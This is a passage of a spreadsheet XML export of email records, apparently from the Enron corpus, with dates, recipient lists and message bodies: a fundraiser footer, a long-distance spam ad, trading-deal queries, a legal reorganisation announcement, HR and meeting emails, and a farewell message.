Contact me at: _______________________________________________x000D_
Circle contribution amount above and number of attendees ______________x000D_
_x000D_
Contribution details:_x000D_
Make checks to Michael Berry Campaign.  Individual, PAC &amp; L.P. checks_x000D_
allowable, but no corporate checks.  If mailing a check, send to 223_x000D_
Westheimer, Houston, TX  77006._x000D_
_x000D_
Pol. ad. paid for by Michael Berry Campaign, 55 Waugh, Suite 610,_x000D_
Houston, TX 77007. Walter Zivley, Treas. Sue Walden, Fundraiser. Fred_x000D_
Zeidman, Chairman._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 28 Oct 2001 00:47:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vx7rs3fstb@hotmail.com'})</t>
  </si>
  <si>
    <t>frozenset({'w2bmadxd8d29d@hotmail.com'})</t>
  </si>
  <si>
    <t>UNLIMITED Long Distance at $0.00 per minute!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
WELCOME TO THE FUTURE OF TELECOMMUNICATIONS _x000D_
_x000D_
    Talk all you want.  No per minute charges.  No Contracts.  No switching Carriers. 	 Progressive Technologies  now offers  UNLIMITED Long Distance CallingStarting At $49.95 Per Month   Zero Cents Per Minute Calling. No Hidden Fees - No Contracts In-State and Out of State Long Distance are Covered  ANYONE can benefit. Travelers, Students, and Business People.  Pay By the Month No Time Restrictions Use From Any Phone Outstanding Quality Service   Receive More Information About This Plan Here! *  - The Future Is Now - 	_x000D_
_x000D_
_x000D_
 _x000D_
*By clicking on any of the above links, you agree to and are requesting to receive more information _x000D_
from our company regarding our products and services._x000D_
We are an Internet Notification Company that instantly notifies you in advance of new technologies available to the public. You've qualified for our notification service through one of the following: web site registration, search engine registration, or one of several opt in email campaigns. To be removed from all future mailings from our company, simply click here  and enter the email address you would like to have removed. _x000D_
_x000D_
We strongly oppose the use of SPAM email and do not want anyone who does not wish to receive our mailings to receive them. As a result, we have retained the services of an independent 3rd party to administer our list management and remove list. This is not SPAM. If you do not wish to receive further mailings, please click below and enter your email at the bottom of the page. You may then rest-assured that you will never receive another email from us again. http://www.removeyou.com _x000D_
The 21st Century Solution. Client I.D. Number 022481 </t>
  </si>
  <si>
    <t>Thu, 8 Feb 2001 08:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>NCPA</t>
  </si>
  <si>
    <t>There are 4 deals for Northern CA Power Agency and they have wonderful notes _x000D_
about confirming them together.  However, I need a contact name, and isn't _x000D_
NCPA on the credit watch list?_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Fri, 11 Jan 2002 12:30:21 -0800 (PST)</t>
  </si>
  <si>
    <t>UBS</t>
  </si>
  <si>
    <t>UBS bought 100% of trading</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2000 10:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>do i have to wear a tux or a suit</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 07:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'janice.moore@enron.com', 'kaye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'luiz.watanabe@enron.com', 'linda.simmons@enron.com', 'richard.sanders@enron.com', 'carlos.sole@enron.com', 'justin.boyd@enron.com', 'lou.stoler@enron.com', 'carolyn.george@enron.com', 'david.minns@enron.com', 'mark.taylor@enron.com', 'mark.greenberg@enron.com', 'ed.iii@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'mark.powell@enron.com', 'karla.azevedo@enron.com', 'jan.king@enron.com', 'james.grace@enron.com', 'jane.mcbride@enron.com', 'janette.elbertson@enron.com', 'francisco.leite@enron.com', 'kathleen.carnahan@enron.com', 'mary.ogden@enron.com', 'rahul.saxena@enron.com', 'kimberlee.bennick@enron.com', 'suzanne.adams@enron.com', 'linda.guinn@enron.com', 'mary.cook@enron.com', 'andrea.calo@enron.com', 'lance.schuler-legal@enron.com', 'sandi.braband@enron.com', 'larry.pardue@enron.com', 'wendi.hoelscher@enron.com', 'taffy.milligan@enron.com', 'john.novak@enron.com', 'bob.carter@enron.com', "denis.o'connell@enron.com", 'susan.bailey@enron.com', 'marcus.nettelton@enron.com', 'peter.keohane@enron.com', 'sheila.tweed@enron.com', 'coralina.rivera@enron.com', 'janet.moore@enron.com', 'barbara.gray@enron.com', 'maria.beccaccini@enron.com', 'daniel.rogers@enron.com', 'mark.elliott@enron.com', 'chris.gaffney@enron.com', 'dan.hyvl@enron.com', 'pat.radford@enron.com', 'greg.johnston@enron.com', 'wayne.gresham@enron.com', 'merrill.haas@enron.com', 'kay.mann@enron.com', 'shawna.flynn@enron.com', 'connie.castillo@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'celina.ozorio@enron.com', 'sandra.vassel@enron.com', 'steve.hooser@enron.com', 'matt.maxwell@enron.com', 'leslie.hansen@enron.com', 'edmund.cooper@enron.com', 'stuart.zisman@enron.com', 'mark.evans@enron.com', 'randy.young@enron.com', 'christian.yoder@enron.com', 'paula.porto@enron.com', 'matthias.lee@enron.com', 'nancy.corbet@enron.com', 'jeffrey.hodge@enron.com', 'sarah.bruck@enron.com', 'peggy.banczak@enron.com', 'becky.spencer@enron.com', 'anne.koehler@enron.com', 'barton.clark@enron.com', 'laurie.mayer@enron.com', 'patricia.dutra@enron.com', 'maryhelen.martinez@enron.com', 'angela.davis@enron.com', 'stacy.dickson@enron.com', 'robert.walker@enron.com', 'kay.young@enron.com', 'miguel.mendoza@enron.com', 'robert.quick@enron.com', 'sami.arap@enron.com', 'debra.perlingiere@enron.com', 'reginald.shanks@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'michael.robison@enron.com', 'holly.keiser@enron.com', 'martin.rosell@enron.com', 'peter.vecchio@enron.com', 'robert.george@enron.com', 'cheryl.nelson@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com', 'nancy.muchmore@enron.com', 'travis.mccullough@enron.com', 'karen.jones@enron.com', 'claudia.meraz@enron.com', 'brenda.whitehead@enron.com', 'brent.hendry@enron.com', 'eddy.daniels@enron.com', 'fabian.valle@enron.com', 'deb.korkmas@enron.com', 'andrew.edison@enron.com', 'bruce.lundstrom@enron.com', 'twanda.sweet@enron.com', 'dale.rasmussen@enron.com', 'martha.braddy@enron.com', 'ann.white@enron.com', 'roger.balog@enron.com', 'teresa.bushman@enron.com', 'elizabeth.sager@enron.com', 'alan.larsen@enron.com', 'ned.crady@enron.com', 'paul.simons@enron.com', 'john.viverito@enron.com', 'yo.yamanishi@enron.com', 'dan.lyons@enron.com', 'limor.nissan@enron.com', 'shari.stack@enron.com', 'mary.heinitz@enron.com', 'frank.sayre@enron.com', 'tana.jones@enron.com', 'carol.clair@enron.com', 'sheri.cromwell@enron.com', 'margaret.doucette@enron.com', 'dina.snow@enron.com', 'robert.bruce@enron.com', 'angeline.poon@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">We are pleased to announce organizational changes to the Enron South America _x000D_
legal department in response to the recent reorganization and realignment of _x000D_
the principal Enron Wholesale Services business units operating in the _x000D_
region, Enron Americas and Enron Global Assets. _x000D_
_x000D_
Randy Young, currently General Counsel of ESA, will be assuming new _x000D_
responsibilities within Enron.  John Novak will become General Counsel of _x000D_
ESA, reporting to Mark Haedicke.  The ESA legal department will be _x000D_
responsible for supporting all Enron Americas and Enron Global Assets _x000D_
businesses in the region.  Additional legal resources, coordinated by Lance _x000D_
Schuler, will be provided from EWS Legal in Houston to support ESA's _x000D_
wholesale activities.  John will also work closely with Bruce Lundstrom, _x000D_
General Counsel of EGA, to coordinate legal support with respect to the EGA _x000D_
businesses in the region.  An organizational chart describing the new _x000D_
structure is attached._x000D_
_x000D_
This new structure will enable us to continue to provide quality legal _x000D_
support across business lines within South America while improving _x000D_
coordination and providing additional support from Houston for Enron's _x000D_
existing operating businesses, as well as the new business development _x000D_
initiatives under way in the region._x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 06:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>deal 557724</t>
  </si>
  <si>
    <t>Tom ALonso_x000D_
deal 557724_x000D_
Bloomberg shows cp name as Arizona Public Service and enpower has Pinnacle _x000D_
West_x000D_
Can you please check with Tom on the correct cp name.  _x000D_
_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Re: Var, Reporting and Resources Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">I will not be able to attend_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Airam Arteaga                           10/11/2000 09:17 AM_x000D_
	_x000D_
_x000D_
To: Phillip K Allen/HOU/ECT@ECT, Thomas A Martin/HOU/ECT@ECT, Scott _x000D_
Neal/HOU/ECT@ECT, John Arnold/HOU/ECT@ECT, Ted Murphy/HOU/ECT@ECT, Vladimir _x000D_
Gorny/HOU/ECT@ECT, Frank Hayden/Corp/Enron@Enron_x000D_
cc: Rita Hennessy/NA/Enron@Enron, Ina Rangel/HOU/ECT@ECT, Laura _x000D_
Harder/Corp/Enron@Enron, Kimberly Brown/HOU/ECT@ECT, Araceli _x000D_
Romero/NA/Enron@Enron, Kay Chapman/HOU/ECT@ECT _x000D_
Subject: Var, Reporting and Resources Meeting_x000D_
_x000D_
REMINDER - Please see below._x000D_
---------------------- Forwarded by Airam Arteaga/HOU/ECT on 10/11/2000 09:14 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Airam Arteaga                           10/04/2000 02:23 PM_x000D_
	_x000D_
_x000D_
To: Phillip K Allen/HOU/ECT@ECT, Thomas A Martin/HOU/ECT@ECT, Scott _x000D_
Neal/HOU/ECT@ECT, John Arnold/HOU/ECT@ECT, Grant Masson/HOU/ECT@ECT, Ted _x000D_
Murphy/HOU/ECT@ECT, Vladimir Gorny/HOU/ECT@ECT, Frank Hayden/Corp/Enron@Enron_x000D_
cc: Rita Hennessy/NA/Enron@Enron, Ina Rangel/HOU/ECT@ECT, Laura _x000D_
Harder/Corp/Enron@Enron, Kimberly Brown/HOU/ECT@ECT, Araceli _x000D_
Romero/NA/Enron@Enron, Kimberly Hillis/HOU/ECT@ect _x000D_
Subject: Var, Reporting and Resources Meeting_x000D_
_x000D_
Please plan to attend the below  Meeting:_x000D_
_x000D_
_x000D_
                                Topic:  Var, Reporting and Resources Meeting_x000D_
        _x000D_
  Date:  Wednesday, October 11th_x000D_
_x000D_
  Time:  2:30 - 3:30 _x000D_
_x000D_
  Location: EB30C1_x000D_
_x000D_
  _x000D_
_x000D_
 If you have any questions/conflicts, please feel free to call me._x000D_
_x000D_
Thanks,_x000D_
Rain_x000D_
x.31560_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 08:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Sevil Yamin</t>
  </si>
  <si>
    <t xml:space="preserve">Anne,_x000D_
_x000D_
Thanks._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
From: Anne Labbe/ENRON@enronXgate on 04/10/2001 03:10 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: RE: Sevil Yamin_x000D_
_x000D_
Thanks.  I will start working on getting her a project bonus.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Kaminski, Vince  _x000D_
Sent: Tuesday, April 10, 2001 3:05 PM_x000D_
To: Labbe, Anne_x000D_
Cc: Kaminski, Vince; Shanbhogue, Vasant; Norma Villarreal/HOU/ECT@ENRON; _x000D_
Gibner, Stinson_x000D_
Subject: Sevil Yamin_x000D_
_x000D_
Anne,_x000D_
_x000D_
Vasant sent this information to Norma. I shall fwd his message to you._x000D_
_x000D_
Vince_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/10/2001 _x000D_
03:02 PM ---------------------------_x000D_
_x000D_
_x000D_
Stinson Gibner_x000D_
04/10/2001 02:57 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Sevil Yamin_x000D_
_x000D_
Vince,_x000D_
_x000D_
Do you want me to do this, or Vasant?_x000D_
_x000D_
--Stinson_x000D_
_x000D_
---------------------- Forwarded by Stinson Gibner/HOU/ECT on 04/10/2001 _x000D_
02:57 PM ---------------------------_x000D_
From: Anne Labbe/ENRON@enronXgate on 04/06/2001 09:57 AM_x000D_
To: Stinson Gibner/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Sevil Yamin_x000D_
_x000D_
Stinson,_x000D_
_x000D_
I am the new HR generalist for the research group because Norma Villarreal is _x000D_
moving to Business Analysis and Reporting.  Earlier this week, Norma and I _x000D_
met with Vince, and he said that he was going to talk to you about writing up _x000D_
a list of Sevil's projects/ accomplishments for last year and this year, so _x000D_
that we can give her a project bonus since she did not receive a bonus during _x000D_
the normal PRC time.  At your earliest convenience, will you please email me _x000D_
this list so that I can get started putting together all of the paperwork so _x000D_
that she can receive a check on April 16th._x000D_
_x000D_
If you have any questions, please feel free to contact me at 5-7809. I look _x000D_
forward to meeting you, and the rest of the group next week at Vince's staff _x000D_
meeting._x000D_
_x000D_
Thanks,_x000D_
Anne Labbe'_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 03:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Best of Luck, Mary.  Don't let them make California mistakes Down-East_x000D_
style!  Call if you ever need any thing from the left coast.  Mike Day_x000D_
_x000D_
-----Original Message-----_x000D_
From: Mary.Hain@enron.com [mailto:Mary.Hain@enron.com]_x000D_
Sent: Friday, March 23, 2001 10:24 AM_x000D_
To: David_Aamodt@pgn.com; dapnucc@teleport.com; dick@pnucc.org;_x000D_
seabron.adamson@frontier-economics.com; Frank_Afranji@pgn.com;_x000D_
raa@vnf.com; Joseph.Alamo@enron.com; ajaldrich@snopud.com;_x000D_
Jeff.Alexander@enron.com; Al.Alexanderson@enron.com;_x000D_
Keonee.Almaida@enron.com; hollis.alpert@ferc.fed.us;_x000D_
Brenda.Anderson@enron.com; angles@howry.com; Alan.B.Aronowitz@enron.com;_x000D_
gdb@vnf.com; npbaker@bpa.gov; ellen@tca-us.com; paulb@citizenspower.com;_x000D_
paulb@citizenspower.com; garybarbour@email.msn.com;_x000D_
jbartus@cammckenna.com; glynda.becker@mail.house.gov;_x000D_
Samuel.Behrends@enron.com; bbennett@bpa.gov; sberman@hewm.com;_x000D_
ramsen.betfarhad@mail.house.gov; KBILAS@SKADDEN.COM; sbooye@Skadden.com;_x000D_
raymond.r.boyce@state.or.us; tbradley@bracepatt.com;_x000D_
scott.brattebo@pacificorp.com; sbrose@steptoe.com;_x000D_
sbuchheit@bracepatt.com; alanb@wutc.wa.gov; Jim.Byrne@enron.com;_x000D_
vergil.cabasco@mail.house.gov; johncameron@dwt.com;_x000D_
Doug.Carmichael@enron.com; Ed.Cassidy@enron.com; ajchambe@llgm.com;_x000D_
Melissa.Chiechi@enron.com; elchristensen@snopud.com;_x000D_
kevin.clark@ci.seattle.wa.us; rcloward@avistacorp.com;_x000D_
david_cohen@rniinc.com; Bill.Comish@enron.com;_x000D_
Victor.Contract@enron.com; powerlac@aol.com;_x000D_
Frederick.Coolbroth@enron.com; michaelcorrigan@bchydro.bc.ca;_x000D_
kcorum@nwppc.org; KCurry@bracepatt.com; wcurry@enron.com;_x000D_
gdahlke@paine-hamblen.com; kadaly@mcimail.com; mday@gmssr.com;_x000D_
dearing@chelanpud.org; tdeboer@paine-hamblen.com; Tom_Delaney@enron.com;_x000D_
sdleonard@earthlink.net; dldorrell@stoel.com; Mary.Doyle@enron.com;_x000D_
Jay.Dudley@enron.com; mce2280@idahopower.com;_x000D_
michaelearly@earthlink.net; Katherine.Edwards@enron.com;_x000D_
rle@givenspursley.com; imaxtrans@aol.com; Chris.Elliott@enron.com;_x000D_
sandra.elliott@ferc.fed.us; kerwin@ect.enron.com; dezickson@mwe.com;_x000D_
Jim.Fallon@enron.com; fallonr@howrey.com; Elias.Farrah@enron.com;_x000D_
Michele_Farrell@pgn.com; dfaulk@puget.com; gfergus@brobeck.com;_x000D_
Willard.Fields@enron.com; sfisher@avistaenergy.com; pfox@bracepatt.com;_x000D_
Pat.Franklin@enron.com; John.Frazzell@enron.com; ericf@prestongates.com;_x000D_
don.furman@pacificorp.com; segfurst@bpa.gov; Jackie.Gallagher@enron.com;_x000D_
craiggannett@dwt.com; Alvaro.Garcia@enron.com; sbishop@gibbs-bruns.com;_x000D_
wgibson@nwppc.org; ggilbert@ci.tacoma.wa.us; Pat.Gilman@enron.com;_x000D_
Alex.Goldberg@enron.com; jlgreene@energyadvocates.com;_x000D_
Chris_Groener@mail.house.gov; Mary.Groggin@enron.com;_x000D_
Mark.E.Haedicke@enron.com; Stephen.Hall@enron.com;_x000D_
steve.c.hall@enron.com; Leo.Hamblin@enron.com; whannaford@NWPPC.org;_x000D_
jim.harding@ci.seattle.wa.us; rhardy@hardyenergy.com; kharri@puget.com;_x000D_
Steve_Hawke@pgn.com; dhawkins@caiso.com; marc.hellman@state.or.us;_x000D_
Scott.Helyer@enron.com; mhenry@bracepatt.com; dwmp@teleport.com;_x000D_
rhornby@tca-us.com; mhornst@aol.com; dhuard@jmbm.com;_x000D_
Marlene.Huntsinger@pgn.com; cfi1@tca-us.com;_x000D_
Richard.Ingersoll@enron.com; pljacklin@stoel.com; montrey@aol.com;_x000D_
danj@cfmdc.com; kgjohnson@bpa.gov; ljohnson@pwrteam.com;_x000D_
Karen.E.Jones@enron.com; mkanner@kannerandassoc.com;_x000D_
karid@perkinscoie.com; pkaufma@ect.enron.com; Paul.Kaufman@enron.com;_x000D_
Jeffrey.Keeler@enron.com; Devon Kehoe; James.Keller@enron.com;_x000D_
Joe.Kelliher@mail.house.gov; kkennedy@bdbc.com; Rick.Kessler@enron.com;_x000D_
rdking@bpa.gov; Harry.Kingerski@enron.com; Harry.Kingerski@enron.com;_x000D_
rsk@schwabe.com; gwilliams8@austin.rr.com; John.Klauberg@enron.com;_x000D_
Holli.Krebs@enron.com; ekrogh@wiredweb.com; blafferty@avistacorp.com;_x000D_
wdlamb@bpa.gov; John.Lamb@enron.com; Therese.Lamb@enron.com;_x000D_
srlarson@bpa.gov; Cindy_Tatham@co.washington.or.us;_x000D_
zora.lazic@bchydro.com; kaleathley@bpa.gov; pamela_lesh@pgn.com;_x000D_
Debi.LeVine@enron.com; lcg@europa.com; doug.little@powerex.com;_x000D_
Robert.Loeffler@enron.com; Chris.Long@enron.com; sjlong@bpa.gov;_x000D_
rlopezv@www.conet.com.mx; david_lucio@iep.illinova.com;_x000D_
king.lum@bchydro.bc.ca; kevin.lynch@pacificorp.com;_x000D_
Mark.Maehr@enron.com; Randal.T.Maffett@enron.com;_x000D_
John.Malowney@enron.com; Sueyen.Mao@enron.com; Susan.J.Mara@enron.com;_x000D_
Susan.J.Mara@enron.com; Lee.Martin@enron.com; maurw@perkinscoie.com;_x000D_
Wayne.Mays@enron.com; Michael.McCall@enron.com;_x000D_
Sandra.McCubbin@enron.com; Travis.McCullough@enron.com;_x000D_
Michael.McDonald@enron.com; brugen@erols.com; mckinley@wpuda.org;_x000D_
mcm@vnf.com; mcnichol@wapa.com; shauna@pnucc.org;_x000D_
Maureen.McVicker@enron.com; pmeringolo@brobeck.com; demetcalf@bpa.gov;_x000D_
cemeyer@bpa.gov; jmilegich@sppc.com; fred_miller@pgn.com;_x000D_
Jeffrey.Miller@enron.com; jerry.miller@pacificorp.com;_x000D_
Laura.Miller@enron.com; scott.miller@ferc.fed.us; Bill.Miner@enron.com;_x000D_
phil_moeller@gorton.senate.gov; pmohler@hewm.com; emoler@velaw.com;_x000D_
nkmorgado@bpa.gov; Mike@tonkon.com; krmoxness@bpa.gov;_x000D_
mmps@millcreeklaw.com; pmurphy@mbllp.com; terrym@millcreeklaw.com;_x000D_
bmurtha@acy.sunint.com; Rich.Nassief@enron.com; tod@mgninc.com;_x000D_
Douglas_Nichols@pgn.com; Patty.Nichols@enron.com;_x000D_
Christi.Nicolay@enron.com; tmnoguchi@bpa.gov; darcy@tonkon.com;_x000D_
Sarah.Novasel@enron.com; Sarah.Novosel@enron.com;_x000D_
Tom.O'Donnell@enron.com; PObenchain@idahopower.com; Pegy.Olds@enron.com;_x000D_
Carol.Opatrny@enron.com; tpaine@avistacorp.com; Dave.Parquet@enron.com;_x000D_
bpascoe@mtpower.com; afpaschke@bpa.gov; ccperigo@bpa.gov;_x000D_
wlpernas@stoel.com; lpeters@pacifier.com; jill@pnucc.org;_x000D_
Mona.L.Petrochko@enron.com; npickover@bracepatt.com;_x000D_
Phillip.Platter@enron.com; Alfred.Pollard@enron.com;_x000D_
Walt.Pollock@enron.com; gporter@sppc.com; Kevin.M.Presto@enron.com;_x000D_
jquint@puget.com; arlene.ragozin@ci.seattle.wa.us; maraschio@bpa.gov;_x000D_
Dale.Rasmussen@enron.com; Scott.Rasmussen@enron.com;_x000D_
Bobby.Reeves@enron.com; preiten@pngc.com; reyna2r@kochind.com;_x000D_
shellyr@pacifier.com; Jeff.Richter@enron.com; raroach@bpa.gov;_x000D_
atrodrigues@bpa.gov; rarogers@bpa.gov; peterroi@erols.com;_x000D_
Rothfelder@rlo-law.com; Richard.Sanders@enron.com; jsaven@pacifier.com;_x000D_
Michael.Schilmoeller@enron.com; jschlect@avistacorp.com;_x000D_
Sabine.Schnittger@frontier-economics.com; Diana.Scholtes@enron.com;_x000D_
Roger.Seifert@enron.com; Cara.Semperger@enron.com;_x000D_
asettanni@bracepatt.com; Richard.Shapiro@enron.com; vsharp@enron.com;_x000D_
msmith1@enron.com; Joshua.Sheinkman@enron.com; jshurts@nwppc.org;_x000D_
Sid@enron.com; msizer@ci.tacoma.wa.us; slavens.paula@deps.ppl.com;_x000D_
small@wrightlaw.com; small@wrightlaw.com; douglas.smith@ferc.fed.us;_x000D_
Mike.Smith@enron.com; Roger.Smith@enron.com; Larry.Soderquist@enron.com;_x000D_
Harvey.Spigal@enron.com; mstauffer@mtpower.com;_x000D_
James.D.Steffes@enron.com; James.D.Steffes@enron.com;_x000D_
mestewardpsedc@worldnet.att.net; JKStier@BPA.gov;_x000D_
rbstrong@paine-hamblen.com; DASwanstrom@Verner.com;_x000D_
Mike.Swerzbin@enron.com; tabors@tca-us.com; Ron.Tapscott@enron.com;_x000D_
James.K.Tarpey@enron.com; Jake.Thomas@enron.com;_x000D_
ryan_thomas@burns.senate.gov; jrt2058@idahopower.com; maryann@pnucc.org;_x000D_
mtierney@sempra.com; robin_tompkins@pgn.com; Ann.Tumlinson@enron.com;_x000D_
AW.Turner@enron.com; Sheila.Tweed@enron.com; Lisa.Urick@enron.com;_x000D_
rvermeers@avistacorp.com; Frank.W.Vickers@enron.com;_x000D_
John.Walley@enron.com; kristiwallis@sprintmail.com; walshl@howrey.com;_x000D_
swalton@enron.com; Steve.Walton@enron.com; kaward@bpa.gov;_x000D_
Kim.Ward@enron.com; Carol.Wardell@enron.com; dwatkiss@bracepatt.com;_x000D_
sawatson@bpa.gov; judy.welch@NWPP.ORG; 211-6155@MCIMAIL.COM;_x000D_
Kwenzel@zzz.com; cwestadt@sppc.com; Brian.Whalen@enron.com;_x000D_
Bill.Williams@enron.com; klwmtp@worldnet.att.net; lyn_williams@pgn.com;_x000D_
Greg.Wolfe@enron.com; Vickie.Wolk-Laniewski@enron.com;_x000D_
Ed.Wood@enron.com; mwood@stoel.com; Steve.Wright@enron.com;_x000D_
Teresa.L.Wright@enron.com; WSCC@enron.com; Charles.Yeung@enron.com;_x000D_
Christian.Yoder@enron.com; Steven.J.Kean@enron.com;_x000D_
Steve.Kean@enron.com; Travel.in.the.Park@enron.com;_x000D_
D.Brett.Hunsucker@enron.com; Carla.Hoffman@enron.com;_x000D_
Bernadette.Hawkins@enron.com; Joe.Hartsoe@enron.com;_x000D_
Donna.Fulton@enron.com; Roger.Fragua@enron.com;_x000D_
James.B.Fallon@enron.com; Michael.Etringer@enron.com;_x000D_
Terry.W.Donovan@enron.com; Stacy.Dickson@enron.com;_x000D_
Ginger.Dernehl@enron.com; Rhonda.L.Denton@enron.com;_x000D_
Jeff.Dasovich@enron.com; Sean.Crandall@enron.com; Tom.Briggs@enron.com;_x000D_
t.briggs@enron.com; Stacey.Bolton@enron.com; dbenevid@enron.com;_x000D_
dbenevid@enron.com; Tim.Belden@enron.com; Robert.Badeer@enron.com;_x000D_
Phillip.K.Allen@enron.com; Alan.Comnes@enron.com; Lysa.Akin@enron.com;_x000D_
Portland.West.Desk@enron.com; assad@elektro.com.br;_x000D_
Alan.Comnes@enron.com; Alberto.Levy@enron.com; Aleck.Dadson@enron.com;_x000D_
Allison.Navin@enron.com; Amy.Fabian@enron.com;_x000D_
Barbara.A.Hueter@enron.com; Bernadette.Hawkins@enron.com;_x000D_
Bill.Moore@enron.com; cristinah@elektro.com.br;_x000D_
Carlos.Gustavo.Azevedo@enron.com; Carmen.Perez@enron.com;_x000D_
Carolyn.Cooney@enron.com; Charles.Yeung@enron.com;_x000D_
Chauncey.Hood@enron.com; Chris.Long@enron.com;_x000D_
Christi.L.Nicolay@enron.com; Cynthia.Sandherr@enron.com;_x000D_
Damon.Harvey@enron.com; Dan.Staines@enron.com;_x000D_
Daniel.Allegretti@enron.com; Dave.Mangskau@enron.com;_x000D_
Donald.Lassere@enron.com; Donna.Fulton@enron.com; Eidy.Catala@enron.com;_x000D_
Elizabeth.Linnell@enron.com; Frank.Rishe@enron.com;_x000D_
Geriann.Warner@enron.com; Ginger.Dernehl@enron.com;_x000D_
Gisele.S.Braz@enron.com; Gloria.Ogenyi@enron.com;_x000D_
Guillermo.Canovas@enron.com; Harry.Kingerski@enron.com;_x000D_
Howard.Fromer@enron.com; James.D.Steffes@enron.com;_x000D_
Janine.Migden@enron.com; Javier.Pantoja@enron.com;_x000D_
Jean.R.Dressler@enron.com; Jean.Ryall@enron.com; Jeff.Brown@enron.com;_x000D_
Jeff.Dasovich@enron.com; Jeffrey.Keeler@enron.com;_x000D_
Joao.Paixao@enron.com; Joe.Allen@enron.com; Joe.Connor@enron.com;_x000D_
Joe.Hartsoe@enron.com; Joe.Hillings@enron.com; Jose.Bestard@enron.com;_x000D_
Joseph.Alamo@enron.com; Kathleen.Sullivan@enron.com;_x000D_
Kerry.Stroup@enron.com; Kikumi.Kishigami@enron.com;_x000D_
Kirsten.Bellas@enron.com; Lara.Leibman@enron.com;_x000D_
Laurie.Knight@enron.com; Leslie.Lawner@enron.com;_x000D_
Linda.J.Noske@enron.com; Linda.Robertson@enron.com;_x000D_
Lindsay.Meade@enron.com; Lisa.Yoho@enron.com; Lora.Sullivan@enron.com;_x000D_
Luiz.Maurer@enron.com; Lysa.Akin@enron.com; Marchris.Robinson@enron.com;_x000D_
Marcia.A.Linton@enron.com; Marcie.Milner@enron.com; Mary.Hain@enron.com;_x000D_
Maureen.McVicker@enron.com; Melinda.Pharms@enron.com;_x000D_
Michelle.Belzak@enron.com; Mona.L.Petrochko@enron.com;_x000D_
Nancy.Hetrick@enron.com; Patrick.Keene@enron.com; Ray.Alvarez@enron.com;_x000D_
Rebecca.W.Cantrell@enron.com; Ricardo.Charvel@enron.com;_x000D_
Richard.Ingersoll@enron.com; Richard.Shapiro@enron.com;_x000D_
Robert.Frank@enron.com; Robert.Hemstock@enron.com;_x000D_
Robert.Neustaedter@enron.com; Robin.Kittel@enron.com;_x000D_
Ron.McNamara@enron.com; rboston@enron.com; Rubena.Buerger@enron.com;_x000D_
Sandra.McCubbin@enron.com; Sarah.Novosel@enron.com;_x000D_
Scott.Bolton@enron.com; Sergio.Assad@enron.com; Stella.Chan@enron.com;_x000D_
Stephen.D.Burns@enron.com; Steve.Montovano@enron.com;_x000D_
Steve.Walton@enron.com; Steven.J.Kean@enron.com; Sue.Nord@enron.com;_x000D_
Susan.J.Mara@enron.com; Susan.M.Landwehr@enron.com;_x000D_
Terri.Miller@enron.com; Thane.Twiggs@enron.com; Tom.Briggs@enron.com;_x000D_
Tom.Chapman@enron.com; Tom.Delaney@enron.com; Tom.Hoatson@enron.com;_x000D_
Tracy.Cooper@enron.com; Valeria.Lima@enron.com; Vinio.Floris@enron.com;_x000D_
Xi.Xi@enron.com; Steven.J.Kean@enron.com; Jeffrey.Keeler@enron.com;_x000D_
Christi.L.Nicolay@enron.com; Sarah.Novosel@enron.com;_x000D_
Robert.Frank@enron.com; Lara.Leibman@enron.com; Gloria.Ogenyi@enron.com;_x000D_
Richard.Shapiro@enron.com; Leslie.Lawner@enron.com;_x000D_
Paul.Kaufman@enron.com; Aleck.Dadson@enron.com;_x000D_
Daniel.Allegretti@enron.com; Howard.Fromer@enron.com;_x000D_
Joe.Hartsoe@enron.com; rboston@enron.com; Janine.Migden@enron.com;_x000D_
Christie.Patrick@enron.com; Jane.Wilson@enron.com;_x000D_
Rhonda.L.Denton@enron.com; kmagruder@newpower.com; scovino@newpower.com;_x000D_
Rebecca.Carter@enron.com; Shelley.Corman@enron.com;_x000D_
Janet.Butler@enron.com; Kevin.M.Presto@enron.com;_x000D_
Brad.Richter@enron.com; Greg.Piper@enron.com; Kevin.McGowan@enron.com;_x000D_
Kim.Ward@enron.com; Leslie.Reeves@enron.com_x000D_
Subject: I'm Leaving Enron_x000D_
_x000D_
_x000D_
I am going to be the Senior Regulatory Counsel at ISO New England starting_x000D_
on April 9, 2001.   My last day in the Portland area will be March 31,_x000D_
2001.  I enjoyed working with you and wish you the best of everything.  My_x000D_
new address will be:_x000D_
_x000D_
Mary Hain_x000D_
Senior Regulatory Counsel_x000D_
